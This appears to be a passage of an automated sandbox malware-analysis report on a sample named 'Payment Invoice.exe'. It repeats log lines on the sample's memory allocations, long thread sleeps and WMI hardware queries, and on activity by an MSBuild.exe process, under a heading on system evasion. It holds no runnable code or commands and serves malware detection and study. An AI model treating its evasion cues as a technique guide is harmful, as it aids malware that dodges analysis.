                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\Payment Invoice.exeMemory allocated: 16314D60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeMemory allocated: 1632E720000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: C60000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4860000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeWindow / User API: threadDelayed 5753Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeWindow / User API: threadDelayed 711Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 5263Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -99873s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -99765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -99656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -99537s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -99406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -99293s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -99187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -99047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -98890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -98765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -98654s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -98530s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -98342s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -98230s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -98120s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -97984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -97835s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -97715s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -97608s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -97495s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -97375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -97234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -97106s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -97000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -96890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -96775s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -96635s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -96523s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -96312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -95914s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -95728s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -95569s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -95375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -95232s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -95031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -94828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -94703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -94567s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -94375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -94244s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -94137s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -93969s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -93781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -93625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -93496s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -93341s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -93203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -93067s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -92890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -92765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -92596s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -92471s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -92312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -91906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -91750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -91603s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -91344s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -91137s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -90937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -90547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -88937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -88531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -88328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -88125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -87922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -87765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -87578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -87416s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -87312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -87203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -87066s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -86937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -86811s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -86703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -86585s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -86464s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -86335s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -86209s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -86086s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -85953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -85843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 5180Thread sleep time: -85734s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -99891s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -99781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -99672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -99563s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -99438s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -99328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -99219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -99094s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -98984s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -98875s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -98766s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -98625s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -98496s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -98391s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -98266s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -98153s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -98047s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -97924s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -97800s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -97610s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -97453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -97328s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -97219s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -97109s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -97000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -96890s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -96721s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -96594s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -96471s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -96344s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -96218s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -96109s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -96000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -95891s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -95764s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -95656s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -95547s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -95438s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -95313s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -95188s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -95078s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -94969s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -94844s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -94728s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -94621s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -94507s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -94405s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -94297s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -94188s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -94063s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 43152Thread sleep time: -93953s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 99873Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 99765Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 99656Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 99537Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 99406Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 99293Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 99187Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 99047Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 98890Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 98765Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 98654Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 98530Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 98342Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 98230Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 98120Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 97984Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 97835Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 97715Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 97608Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 97495Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 97375Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 97234Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 97106Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 97000Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 96890Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 96775Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 96635Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 96523Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 96312Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 95914Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 95728Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 95569Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 95375Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 95232Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 95031Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 94828Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 94703Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 94567Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 94375Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 94244Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 94137Jump to behavior
                Source: C:\Users\user\Desktop\Payment Invoice.exeThread delayed: delay time: 93969Jump to behavior
